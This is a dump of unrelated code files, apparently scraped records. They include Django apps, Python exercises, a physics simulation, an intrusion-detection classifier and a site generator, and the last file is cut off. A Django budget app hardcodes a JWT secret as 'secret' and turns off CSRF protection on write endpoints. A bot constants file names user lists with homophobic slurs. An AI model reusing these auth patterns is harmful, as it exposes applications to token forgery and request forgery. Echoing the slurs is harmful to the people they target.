url(r'^payment_for_iap/$', views.payment_for_iap_logic, name='payment_for_iap'),\n url(r'^payment_for_ios/$', views.payment_for_ios_logic, name='payment_for_ios'),\n\n url(r'^ios_receipt_validation/$', views.ios_receipt_validation_logic, name='ios_receipt_validation'),\n\n\n # 쿠폰 관련 기능\n url(r'^add_member_coupon/$', views.add_member_coupon_logic, name='add_member_coupon'),\n url(r'^get_member_coupon_list/$', views.GetMemberCouponListView.as_view(), name='get_member_coupon_list'),\n url(r'^add_coupon_product_info/$', views.add_coupon_product_info_logic, name='add_coupon_product_info')\n ###################################################################################################################\n]\n","sub_path":"pters_project/payment/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":5412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"291166336","text":"import optparse\nfrom src.ftp_server import FTPHandler\nimport socketserver\nfrom conf import settings\n\nclass ArgvHandler(object):\n def __init__(self):\n self.parser = optparse.OptionParser()\n (options,args) = self.parser.parse_args()\n\n self.verify_args(options, args)\n\n def verify_args(self,options,args):\n #检查并校验相应功能\n if hasattr(self,args[0]):\n func = getattr(self,args[0])\n func()\n else:\n self.parser.print_help()\n\n def start(self):\n print('启动server')\n\n server = socketserver.ThreadingTCPServer((settings.HOST,settings.PORT),FTPHandler)\n server.serve_forever()\n # self.parser = optparse.OptionParser()\n # (options, args) = self.parser.parse_args()\n # self.verify_args(options, args)\n\n\n\n\n","sub_path":"all/day8-homework/server/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"352541429","text":"from hashtable import HashTable\nfrom linkedlist import LinkedList\n\n\ndef left_join_tables(hashtable1, hashtable2):\n \"\"\"[summary]\n This function takes in 2 hashtables and returns an array after\n combining both data structures using left join method.\n \n \"\"\"\n hashtable3 = HashTable(11)\n ht1_keys = []\n ht3_data = []\n\n for item in hashtable1._buckets:\n if item:\n ht1_keys.append(item.get_keys())\n \n for bucket in ht1_keys:\n for key in bucket:\n value1 = hashtable1.get(key)\n value2 = None\n if hashtable2.contains(key):\n value2 = hashtable2.get(key)\n hashtable3.add(key, value1, value2)\n else:\n hashtable3.add(key, value1)\n \n ht3_data.append((key, value1, value2))\n \n for item in hashtable3._buckets:\n if item:\n item.display()\n \n return ht3_data\n\n\nhashtable = HashTable(11)\nhashtable.add('Chuck', 'one')\nhashtable.add('Laura', 'two')\nhashtable.add('Alex', 'three')\nhashtable.add('Ben', 'four')\nhashtable.add('Maddie', 'five')\n\nhashtable2 = HashTable(11)\nhashtable2.add('Ben', '4')\nhashtable2.add('Alex', '3')\nhashtable2.add('Mary', '6')\nhashtable2.add('Alfred', '7')\nhashtable2.add('Laura', '2')\nhashtable2.add('Chuck','1')\n\n\ndata = left_join_tables(hashtable, hashtable2)\n","sub_path":"python/challenges/left_join/left_join.py","file_name":"left_join.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"382038194","text":"# coding:utf-8\n\n'''\n题目1:\n1、让用户输入金额\n2、选择要购买的商品加入购物车\n3、选择完毕时让用户输入N结算,输入Q退出\n4、结算时,如果总价超过了输入的金额提示'余额不足'\n可以尽可能的详细\n\n题目2:判断下面print的值\nprint(1.2-1.0==0.2)\n'''\n\ngoods = [\n {\"name\": \"游艇\", \"price\": \"2000\"},\n {\"name\": \"键盘\", \"price\": \"100\"},\n {\"name\": \"鼠标\", \"price\": \"80\"},\n {\"name\": \"美女\", \"price\": \"500\"},\n {\"name\": \"鸡蛋\", \"price\": \"5\"},\n]\n\n\nclass ShoppingCart():\n add_list = {} # 购买的商品列表 。key==索引。value == 商品的数量\n add_money = 0 # 购买需要的钱\n\n def input_money(self):\n # 判断输入余额是否符合要求\n money = input(\"请输入您的余额(整数即可):\")\n if money.isdigit() and 0 < int(money):\n return money\n else:\n print(\"请输入正确格式的余额\")\n self.input_money()\n\n def add_goods(self, money):\n for el in range(len(goods)):\n print(el+1, goods[el]['name'], goods[el]['price'])\n while 1:\n choose = input(\"请选择您要购买的编号(输入N结算,输入Q退出):\")\n if choose.isdigit() and 0 < int(choose) <= len(goods): # 用户输入的编号正常\n list_index = int(choose) - 1 # 通过用户输入的编号来获得goods的索引\n if self.add_list.get(list_index) == None:\n self.add_list[list_index] = 1\n print(self.add_list)\n else:\n self.add_list[list_index] = self.add_list[list_index] + 1\n print(self.add_list)\n # 把用户选择的商品加入到购物车\n elif choose.upper() == 'Q':\n break\n elif choose.upper() == 'N':\n for f in self.add_list:\n self.add_money = self.add_money + int(self.add_list[f]) * int(goods[f]['price'])\n print(\"预计花费%s\" % self.add_money)\n if int(money) - int(self.add_money) >= 0:\n rest_mone = int(money) - int(self.add_money)\n print(\"您的余额充足。目前剩余可用余额为%s:\" % rest_mone)\n elif int(money) - int(self.add_money) < 0:\n rest_mone = int(self.add_money)-int(money)\n print(\"对不起。您的余额不足。缺少%s元。请充值\" % rest_mone)\n else:\n print(\"出现了某种未知情况\")\n break\n else:\n print(\"您输入的编号有误,请重新输入!\")\n continue\n\n\n\na = ShoppingCart()\nb = a.input_money()\na.add_goods(b)","sub_path":"购物车.py","file_name":"购物车.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"391747717","text":"from __future__ import division\nimport numpy as np\nimport networkx as nx\nfrom multicity import mult\nimport matplotlib.pyplot as plt\n\nbarabasi = nx.barabasi_albert_graph(100, 5, seed=None)\nG=nx.adjacency_matrix(barabasi)\nArrivalTime = []\nfor i in range(30):\n DAT = mult(G)\n ArrivalTime.append(DAT)\nAverageArrival = np.zeros(100)\nVarianceArrival = np.zeros(100)\nfor i in range(100):\n AverageArrival[i]=np.mean(zip(*ArrivalTime)[i])\n VarianceArrival[i] = np.var(zip(*ArrivalTime)[i])\nx = range(100)\n\n\n\n ","sub_path":"statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"464748354","text":"# -*- coding: utf-8 -*-\n\nimport json\n\nfrom django.core.management.base import BaseCommand\nfrom django.conf import settings\nimport socket\nfrom analysis.core import AnalysisCore\n\nclass Command(BaseCommand):\n def add_arguments(self, parser):\n pass\n\n def handle(self, *args, **options):\n port = 8888\n analyzer = AnalysisCore()\n # Init\n analysis_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n analysis_server.bind(('127.0.0.1', port))\n analysis_server.listen(1)\n\n print(\"Analysis Server: listening to port {0}\".format(port))\n while True:\n connection, client_addr = analysis_server.accept()\n try:\n raw_message = connection.recv(256)\n print(\"raw message:{0}\".format(raw_message))\n except socket.error:\n print(\"Socket Error\")\n connection.close()\n try:\n message = str(raw_message).decode(\"utf-8\").strip()\n except:\n print(\"Decode Error\")\n connection.send(json.dumps('Error'))\n continue\n if not message:\n connection.send(json.dumps('Error'))\n continue\n if message.lower() == 'ping':\n connection.send(json.dumps('Analysis Server listening'))\n continue\n connection.send(analyzer.analysis(message))\n # analyze\n","sub_path":"DjangoCodes/CommentAnalysis/CommentAnalysis/management/commands/startanalysis.py","file_name":"startanalysis.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"183241301","text":"ADMINFAG = [\"RealDolos\"]\nPARROTFAG = \"Parrot\"\n\nBLACKFAGS = [i.casefold() for i in (\n \"kalyx\", \"merc\", \"loliq\", \"annoying\", \"bot\", \"RootBeats\", \"JEW2FORU\", \"quag\", \"mire\", \"perici\")]\nOBAMAS = [i.casefold() for i in (\n \"counselor\", \"briseis\", \"apha\", \"bread\", \"ark3\", \"jizzbomb\", \"acid\", \"elkoalemos\", \"tarta\")]\n\nBLACKROOMS = \"e7u-CG\", \"jAzmc3\", \"f66jeG\", \"24_zFd\"\nWHITEROOMS = \"9pdLvy\"\n","sub_path":"volaparrot/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"135407366","text":"# Crie um programa que leia duas notas de um aluno e calcule sua\n# média, mostrando uma mensagem no final, de acordo com sua média\n# atingida:\n# Média abaixo de 5.0: REPROVADO\n# Média entre 5.0 e 6.9: RECUPERAÇÂO\n# Média 7.0 ou superior: APROVADO\nn1 = float(input('Digite a primeira nota: '))\nn2 = float(input('Digite a segunda nota: '))\nmedia = (n1 + n2) / 2\nif media < 5.0:\n print('Aluno REPROVADO!')\nelif media == 5.0 or media < 7.0:\n print('Aluno em RECUPERAÇÃO!')\nelif media >= 7.0:\n print('Aluno APROVADO!')\n","sub_path":"mundo-02/exercicio-040.py","file_name":"exercicio-040.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"9004005","text":"#! /usr/bin/env python\n\n# Maximum error: 0.0000 -- Total error: 0.0000\n# 10 n-body iterations\n# 3265.094042 ms: 0.001505 GFLOP/s\n\nimport numpy as np\nimport time\nfrom numba import *\n\nflopsPerInteraction = 30\nSOFTENING_SQUARED = 0.01\n\n\ndef normalize (vector):\n dist = np.sqrt((vector * vector).sum())\n if dist > 1e-6:\n vector /= dist\n return dist\n\n\ndef randomize_bodies(pos, vel, cluster_scale, velocity_scale, n):\n np.random.seed(42)\n scale = cluster_scale\n vscale = scale * velocity_scale\n inner = 2.5 * scale\n outer = 4.0 * scale\n\n i = 0\n while i < n:\n point = np.random.random(3) / 2.\n length = normalize(point)\n if length > 1.:\n continue\n pos[i,:3] = point * ((inner + (outer - inner)) * np.random.random(3))\n pos[i,3] = 1.0\n axis = np.array((0., 0., 1.))\n normalize(axis)\n if (1 - ((point * axis).sum())) < 1e-6:\n axis[0] = point[1]\n axis[1] = point[0]\n normalize(axis)\n vv = np.cross(pos[i,:3], axis)\n vel[i,:3] = vscale * vv\n vel[i,3] = 1.0\n #print(\"%d: %s, %s\" % (i, pos[i], vel[i]))\n i += 1\n\n\ndef check_correctness(pin, pout, v, dt, n, integrate_0, integrate_1):\n pin_ref = np.zeros_like(pin)\n pout_ref = np.zeros_like(pout)\n v_ref = np.zeros_like(v)\n randomize_bodies(pin_ref, v_ref, 1.54, 8.0, n)\n integrate_0(pout_ref, pin, np.copy(v), dt, n)\n integrate_1(pout, pin, np.copy(v), dt, n)\n \n errt = 0\n errmax = 0\n\n errs = np.fabs(pout_ref - pout).reshape(4 * n)\n errt = errs.sum()\n errmax = errs.max()\n\n print(\"Maximum error: %0.4f -- Total error: %0.4f\" % (errmax, errt))\n\ndef check_overflow(x):\n return np.isnan(np.sum(x)) \n\ndef body_body_interaction(force, pos_mass0, pos_mass1):\n r = pos_mass1[:3] - pos_mass0[:3]\n dist_sqr = (r * r).sum()\n dist_sqr += SOFTENING_SQUARED\n inv_dist = 1.0 / np.sqrt(dist_sqr)\n inv_dist_cube = inv_dist * inv_dist * inv_dist\n s = pos_mass1[3] * inv_dist_cube\n force += r * s\n\ndef integrate(position_out, position_in, velocity, delta_time, n):\n for i in range(n):\n p = position_in[i]\n f = np.zeros(3)\n for j in range(n):\n body_body_interaction(f, p, position_in[j])\n inv_mass = velocity[i,3]\n v = velocity[i,:3] + f * inv_mass * delta_time\n position_out[i,:3] = p[:3] + v * delta_time\n position_out[i,3] = position_in[i,3]\n velocity[i,:3] = v\n\ndef compute_perf_stats(milliseconds, iterations, n):\n interactionsPerSecond = float(n * n)\n interactionsPerSecond *= 1e-9 * iterations * 1000 / milliseconds\n return interactionsPerSecond * flopsPerInteraction;\n\n\ndef main(*args):\n n = 128\n iterations = 10\n dt = 0.01667\n\n if len(args) > 0:\n n = int(args[0])\n if len(args) > 1:\n iterations = int(args[1])\n\n pin = np.zeros((n, 4))\n pout = np.zeros((n, 4))\n v = np.zeros((n, 4))\n\n randomize_bodies(pin, v, 1.54, 8.0, n)\n\n check_correctness(pin, pout, v, dt, n, integrate, integrate)\n\n time0 = time.time()\n for i in range(iterations):\n integrate(pout, pin, v, dt, n)\n pin, pout = pout, pin\n time1 = time.time()\n ms = (time1 - time0)*1000\n gf = compute_perf_stats(ms, iterations, n)\n\n print(\"%d n-body iterations\" % iterations)\n print(\"%f ms: %f GFLOP/s\" % (ms, gf))\n\n\nif __name__ == \"__main__\":\n import sys\n main(*sys.argv[1:])\n","sub_path":"legacy/nbody/nbody_modified_by_MarkHarris.py","file_name":"nbody_modified_by_MarkHarris.py","file_ext":"py","file_size_in_byte":3483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"396830186","text":"import pandas as pd\nimport numpy as np\nfrom sklearn import metrics\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.feature_extraction import DictVectorizer as dv\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn import linear_model\n\nfeature = [\"ct_dst_sport_ltm\"]\n\nraw_train_data = pd.read_csv(\"unsw/UNSW_NB15_training-set.csv\", delimiter=',', encoding=\"utf-8-sig\")\nraw_test_data = pd.read_csv(\"unsw/UNSW_NB15_testing-set.csv\", delimiter=',', encoding=\"utf-8-sig\")\n\ntrain_data = pd.DataFrame(index = raw_train_data.index, columns = feature)\ntest_data = pd.DataFrame(index = raw_test_data.index, columns = feature)\n\nfor item in feature:\n\ttrain_data[item] = raw_train_data[item]\n\ttest_data[item] = raw_test_data[item]\n\ntrain_target = raw_train_data['label']\ntest_target = raw_test_data['label']\n\nfeature_train_data = train_data.as_matrix()\nfeature_train_target = train_target.as_matrix()\n\nfeature_test_data = test_data.as_matrix()\nfeature_test_target = test_target.as_matrix()\n\n# NaiveBayes\nmodel = GaussianNB()\nmodel.fit(feature_train_data, feature_train_target)\nprint(model)\n\nexpected = feature_test_target\npredicted = model.predict(feature_test_data)\n\nprint(\"NaiveBayes GaussianNB\")\nprint(metrics.classification_report(expected, predicted))\nprint(metrics.confusion_matrix(expected, predicted))\n\n","sub_path":"train_test_rule.py","file_name":"train_test_rule.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"43720644","text":"def main():\n outfile = open(\"best.txt\",\"w\")\n print (\"Five Hardest Working Students...\")\n print()\n\n print(\"Please enter the name of\")\n for i in range(5):\n name = input((\"Student {0:}:\").format(i+1))\n print(name, file = outfile)\n\n outfile.close()\n\n\n\nmain()\n\n \n \n","sub_path":"Ch 5 Quiz/Question 16.py","file_name":"Question 16.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"529214845","text":"from django import template\nfrom django.utils.html import format_html, format_html_join\n\nfrom django.urls import reverse\n\nfrom notifications.templatetags import notifications_tags\n\nregister = template.Library()\n\n\n@register.filter\ndef render_field_from_string(form, s):\n if s in form.fields:\n return form[s].as_widget()\n return \"\"\n\n@register.filter\ndef render_field_from_int(form, n):\n if str(n) in form.fields:\n return form[str(n)].as_widget()\n return \"\"\n\n@register.filter\ndef get_item(dictionary, key):\n return dictionary.get(key)\n\n@register.filter\ndef model_name(model):\n return getattr(model, '__name__',\n model.__class__.__name__)\n # return model.__name__\n\n@register.inclusion_tag('smart_link.html')\ndef smart_link(linked_url, link_text, request):\n return locals()\n\n@register.simple_tag(takes_context=True)\ndef live_notifications_smartlink(context, badge_class='live_notifications_smartlink'):\n user = notifications_tags.user_context(context)\n if not user:\n return ''\n html = \"notifications ({unread})\".format(\n badge_class=badge_class,\n unread=user.notifications.unread().count(),\n )\n if 'notifications' not in context['request'].path:\n html = \"{html}\".format(\n link_url=reverse('notifications'),\n html=html\n )\n html = \"
  • {html}
  • \".format(html=html)\n return format_html(html)\n\n# @register.inclusion_tag('notifications_badge.html')\n# def smart_link(linked_url, link_text, request):\n# link_text = f'notifications ({})'\n# return locals()\n\n\n\n# @register.filter\n# def modelname(model):\n# return model.__name__\n\n# def display_user(user):\n# display = f'{user.username}'\n# return format_html(\"{}\",\n# user.email, user.username)\n\n# @register.simple_tag\n# def user(user):\n# return display_user(user)\n\n# @register.filter\n# def display_user_list(ul):\n# return format_html_join(\n# ', ',\n# '{}',\n# ((u.email, u.username) for u in ul)\n# )\n\n","sub_path":"main/templatetags/main_tags.py","file_name":"main_tags.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"584881701","text":"#!/usr/bin/env python\n\n# Copyright 2016 Netherlands eScience Center\n#\n# Licensed under the Apache License, Version 2.0 (the 'License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import print_function\nimport argparse\nfrom datetime import datetime\nimport logging\nfrom os import mkdir\nfrom os.path import isfile\nfrom string import Template\nimport urllib2\n\nimport github3\nimport yaml\n\n\ndef generate_config(organization, configfn):\n gh = github3.GitHub()\n org = gh.organization(organization)\n\n config = {\n 'title': org.name,\n 'slug': org.login,\n 'description': org._json_data['description'],\n 'baseurl': '',\n 'created_at': org.created_at,\n 'urls': {\n 'avatar': org.avatar_url,\n 'organization': org.html_url,\n 'project': org.blog,\n },\n 'partners': [{\n 'logo_url': 'https://www.esciencecenter.nl/img/pressroom/ESCIENCE_logo_C_nl_cyanblack.jpg',\n 'url': 'https://www.esciencecenter.nl'\n }, {\n 'logo_url': '',\n 'url': ''\n }],\n 'markdown': 'kramdown',\n 'excludes': [\n 'README.md',\n 'utils',\n ],\n 'keep_files': [\n 'assets',\n ''\n ],\n 'collections': {\n 'repos': {\n 'output': False\n },\n 'team_members': {\n 'output': True,\n 'permalink': '/team/:path'\n }\n },\n 'defaults': [{\n 'scope': {\n 'path': '',\n 'type': 'posts'\n },\n 'values': {\n 'layout': 'post'\n },\n 'scope': {\n 'path': '',\n 'type': 'team_members'\n },\n 'values': {\n 'layout': 'team'\n }\n }]\n }\n\n yaml.dump(config, configfn, default_flow_style=False)\n\n\ndef generate_repo(repo, repo_fn):\n repo_tpl = Template('''---\ntitle: $title\nlanguage: $language\nlicense: $license\nhomepage: $homepage\ngithub: $github_url\n---\n$description\n ''')\n config = {\n 'title': repo.name,\n 'description': repo.description,\n 'language': repo.language,\n 'license': repo.license().license['name'],\n 'homepage': repo.homepage or repo.html_url,\n 'github_url': repo.html_url,\n }\n if not repo.homepage:\n logging.warning('{} has no homepage, falling back to github repo'.format(repo.name))\n repo = repo_tpl.substitute(config)\n\n with open(repo_fn, 'w') as repo_markdown_file:\n print(repo, file=repo_markdown_file)\n\n\ndef generate_repos(organization):\n gh = github3.GitHub()\n org = gh.organization(organization)\n\n repos_dir = '_repos'\n try:\n mkdir(repos_dir)\n except OSError:\n pass\n\n for repo in org.repositories('public'):\n if repo.name.endswith('github.io'):\n # skip self\n continue\n repo_fn = '{}/{}.md'.format(repos_dir, repo.name)\n if isfile(repo_fn):\n # Don't overwrite\n continue\n generate_repo(repo, repo_fn)\n\n\ndef generate_publication(doi, style):\n logging.warn('Fetching meta data for {}'.format(repr(doi)))\n url = 'http://dx.doi.org/' + doi\n opener = urllib2.build_opener()\n opener.addheaders = [('Accept', 'text/bibliography; style={}'.format(style))]\n try:\n response = opener.open(url)\n\n publication = response.read()\n publication_html = '
  • {}
  • '.format(publication)\n if doi in publication_html:\n if url in publication_html:\n publication_html = publication_html.replace(url, '{}'.format(url, url))\n else:\n publication_html = publication_html.replace(doi, '{}'.format(url, doi))\n return publication_html\n except urllib2.HTTPError:\n logging.warn('Unable to fetch publication for {}, skipping'.format(doi))\n return ''\n\n\ndef generate_publications(style, dois_fn, publications_fn):\n dois = yaml.load(dois_fn)\n\n header = '''\n

     Publications

    \n
      \n '''.format(now=datetime.now())\n\n print(header, file=publications_fn)\n\n if dois is not None:\n for doi in dois:\n publication = generate_publication(doi, style)\n print(publication, file=publications_fn)\n\n print('
    ', file=publications_fn)\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Generate Jekyll files')\n subparsers = parser.add_subparsers()\n\n config_parser = subparsers.add_parser('config', help='Generate Jekyll _config.yml file')\n config_parser.add_argument('organization', help='Github organization or user name')\n config_parser.add_argument('configfn',\n default='_config.yml',\n type=argparse.FileType('w'),\n help=\"Filename for config file. Default _config.yml. Use - for stdout\")\n config_parser.set_defaults(func=generate_config)\n\n repos_parser = subparsers.add_parser('repos', help='Generate markdown file for organization repos')\n repos_parser.add_argument('organization', help='Github organization or user name')\n repos_parser.set_defaults(func=generate_repos)\n\n publ_parser = subparsers.add_parser('publications', help='Generates publications html file')\n publ_parser.add_argument('dois_fn',\n type=argparse.FileType('r'),\n default='_data/dois.yml',\n nargs='?',\n help='Filename of dois yaml file')\n publ_parser.add_argument('publications_fn',\n type=argparse.FileType('w'),\n default='_includes/publications.html',\n nargs='?',\n help='Filename of publications html file')\n publ_parser.add_argument('--style',\n default='apa',\n help='Style of citation, see http://api.crossref.org/styles for supported styles, default is apa')\n publ_parser.set_defaults(func=generate_publications)\n\n args = parser.parse_args()\n fargs = vars(args)\n if 'func' in args:\n func = args.func\n del(fargs['func'])\n func(**fargs)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"utils/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":7115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"385568402","text":"YEAR = (2, 'year')\nMONTH = (3, 'month')\nDAY = (4, 'day')\nHOUR = (5, 'hour')\nDIRECTION_COLUMN = (23, 'wind_direction')\nVELOCITY_COLUMN = (25, 'wind_velocity')\nGUST_COLUMN = (27, 'wind_gust')\nTEMPERATURE = (29, 'temperature')\nPRESSURE = (41, 'pressure')\nCURRENT_WEATHER = (52, 'current_weather')","sub_path":"src/wind_forecast/preprocess/synop/consts.py","file_name":"consts.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"599590674","text":"from django.conf.urls.defaults import *\n\nurlpatterns = patterns(\n 'wizards_duel.duel.views',\n (r'^$', 'duel_index'),\n (r'create/$', 'duel_index'),\n (r'^(?P\\d+)/$', 'duel_detail'),\n (r'^(?P\\d+)/join/avatar/(?P\\d+)/$', 'join'),\n (r'^(?P\\d+)/avatar/(?P\\d+)/(?P\\w+)/', 'add_action'),\n)\n\n\n","sub_path":"duel/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"291844538","text":"from django.http import JsonResponse\nfrom django.shortcuts import render\nfrom .models import TicketApprov, TicketApprovItem, Approv, Product, LigneBudget, PosteBudget\nfrom django.db.models import F\nimport json\nfrom django.views.decorators.csrf import csrf_exempt\nimport jwt\nfrom datetime import datetime, timedelta\nfrom django.core.mail import send_mail\nfrom .views import tokenVerification\n\nJWT_SECRET = 'secret'\nJWT_ALGORITHM = 'HS256'\nJWT_EXP_DELTA_SECONDS = 50000\n\n\ndef sumAmount(param):\n b = 0\n for item in param:\n b = b + item['amount']\n #b=b+item\n return b\n\n\n@csrf_exempt\ndef newPoste(request):\n req = request.body\n my_json = req.decode('utf8').replace(\"'\", '\"')\n my_json = json.loads(my_json)\n poste = PosteBudget.objects.create(name = my_json['name'], type = my_json['type'], year = my_json['year'])\n for item in my_json['ligne']:\n LigneBudget.objects.create(name = item['name'], amount = item['amount'], posteBudget = poste)\n return JsonResponse({})\n\n\n@csrf_exempt\ndef editPoste(request):\n req = request.body\n my_json = req.decode('utf8').replace(\"'\", '\"')\n my_json = json.loads(my_json)\n print(my_json)\n poste = PosteBudget.objects.get(pk = my_json['id'])\n LigneBudget.objects.filter(posteBudget=my_json['id']).delete()\n for item in my_json['ligne']:\n LigneBudget.objects.create(name = item['name'], amount = item['amount'], posteBudget = poste)\n return JsonResponse({})\n\n\n@csrf_exempt\ndef listePosteFonctionnement(request):\n poste=[]\n for pst in PosteBudget.objects.filter(type=\"fonctionnement\"):\n ligne = [elt.serializable() for elt in LigneBudget.objects.filter(posteBudget__id=pst.pk)]\n poste.append({\n \"id\": pst.pk,\n \"name\": pst.name,\n \"type\": pst.type,\n \"year\": pst.year,\n \"amount\": sumAmount(ligne)\n })\n #return JsonResponse([poste.serializable() for poste in PosteBudget.objects.filter(type=\"fonctionnement\")], safe=False)\n return JsonResponse(poste, safe=False)\n\n\n@csrf_exempt\ndef listePosteInvestissement(request):\n poste=[]\n for pst in PosteBudget.objects.filter(type=\"investissement\"):\n ligne = [elt.serializable() for elt in LigneBudget.objects.filter(posteBudget__id=pst.pk)]\n poste.append({\n \"id\": pst.pk,\n \"name\": pst.name,\n \"type\": pst.type,\n \"year\": pst.year,\n \"amount\": sumAmount(ligne)\n })\n #return JsonResponse([poste.serializable() for poste in PosteBudget.objects.filter(type=\"investissement\")], safe=False)\n return JsonResponse(poste, safe=False)\n\n\n@csrf_exempt\ndef listeLigneFonctionnement(request):\n return JsonResponse([poste.serializable() for poste in LigneBudget.objects.filter(posteBudget__type=\"fonctionnement\")], safe=False)\n\n\n@csrf_exempt\ndef listeLigneInvestissement(request):\n return JsonResponse([ligne.serializable() for ligne in LigneBudget.objects.filter(posteBudget__type=\"investissement\")], safe=False)\n\n\n\n@csrf_exempt\ndef approvStats(request):\n payload = tokenVerification(request.headers['Authorization'].split(' ')[1])\n allApprov = Approv.objects.filter(user__id = payload['user_id']).count()\n successApprov = Approv.objects.filter(user__id = payload['user_id'], higherDecision=1, infoDecision=1).count()\n rejectApprov = Approv.objects.filter(user__id = payload['user_id'], higherDecision=2).filter(user__id = payload['user_id'], infoDecision=2).count()\n cancelApprov = Approv.objects.filter(user__id = payload['user_id'], higherDecision=3).filter(user__id = payload['user_id'], infoDecision=3).count()\n waitingApprov = Approv.objects.filter(user__id = payload['user_id'], higherDecision=1, infoDecision=0).count() + Approv.objects.filter(user__id = payload['user_id'], higherDecision=0, infoDecision=1).count() + Approv.objects.filter(user__id = payload['user_id'], higherDecision=0, infoDecision=0).count()\n print(allApprov)\n return JsonResponse({\"all\": allApprov, \"success\": successApprov, \"reject\": rejectApprov, \"cancel\": cancelApprov, \"waiting\": waitingApprov})\n\n\n@csrf_exempt\ndef decisionTicketApprov(request):\n req = request.body\n my_json = req.decode('utf8').replace(\"'\", '\"')\n data=json.loads(my_json)\n payload = tokenVerification(request.headers['Authorization'].split(' ')[1])\n TicketApprov.objects.filter(id=data[\"id\"]).update(userDecision=data[\"decision\"], message=data[\"message\"])\n if data[\"decision\"]==1 :\n for item in TicketApprovItem.objects.filter(ticketapprov=data['id']):\n Product.objects.filter(name=item.product).update(quantity=F('quantity')-item.sendquantity)\n return JsonResponse({\"message\": \"well done\"})\n\n\n@csrf_exempt\ndef sendingMail(receiver, name):\n subject = \"Ticket approvision\"\n message = \"Bonjour monsieur {name}, veillez confirmer la reception du matériel recu\".format(name=name)\n send_mail(subject, message, 'jerarlmalim@gmail.com' , [receiver], fail_silently = False)\n\n\n@csrf_exempt\ndef listTicketApprovs(request):\n payload = tokenVerification(request.headers['Authorization'].split(' ')[1])\n ticketApprovs = TicketApprov.objects.all()\n return JsonResponse([ticket.serializable() for ticket in ticketApprovs], safe=False)\n\n\n@csrf_exempt\ndef listPersonnalTicketApprovs(request):\n payload = tokenVerification(request.headers['Authorization'].split(' ')[1])\n ticketApprovs = TicketApprov.objects.filter(approv__user__id=payload['user_id'])\n return JsonResponse([ticket.serializable() for ticket in ticketApprovs], safe=False)\n\n\n\n@csrf_exempt\ndef listTicketApprovsItem(request):\n payload = tokenVerification(request.headers['Authorization'].split(' ')[1])\n ticketApprovsItem = TicketApprovItem.objects.all()\n return JsonResponse([ticket.serializable() for ticket in ticketApprovsItem], safe=False)\n\n\n@csrf_exempt\ndef addTicketApprovs(request):\n req = request.body\n my_json = req.decode('utf8').replace(\"'\", '\"')\n my_json = my_json.replace(\",{\", \";{\")\n my_json = my_json.replace(\"[\", \"\")\n my_json = my_json.replace(\"]\", \"\")\n app = my_json.split(\";\")\n payload = tokenVerification(request.headers['Authorization'].split(' ')[1])\n ticketApprov = TicketApprov.objects.create(approv=Approv.objects.get( id=(json.loads(app[0]))[\"approv\"] ), message=\"\")\n ticketApprov.save()\n for item in app:\n item=json.loads(item)\n if (item['send'] > Product.objects.filter(name=item['product']).waitingquantity ):\n return JsonResponse({'message': 'Le ticket ne peut etre créé car certains produits ne sont pas suffissant en stock'})\n else:\n TicketApprovItem.objects.create(product=item['product'], sendquantity=item['send'], initialquantity=item['quantity'], ticketapprov=ticketApprov)\n Product.objects.filter(name=item['product']).update(waitingquantity=F('waitingquantity')-item['send'])\n data=Approv.objects.get( id=(json.loads(app[0]) )[\"approv\"] )\n sendingMail(data.user.email, data.user.name)\n return JsonResponse({})\n\n\n@csrf_exempt\ndef modifTicketApprov(request):\n req = request.body\n my_json = req.decode('utf8').replace(\"'\", '\"')\n my_json = my_json.replace(\",{\", \";{\")\n my_json = my_json.replace(\"[\", \"\")\n my_json = my_json.replace(\"]\", \"\")\n app = my_json.split(\";\")\n payload = tokenVerification(request.headers['Authorization'].split(' ')[1])\n ticketApprov = 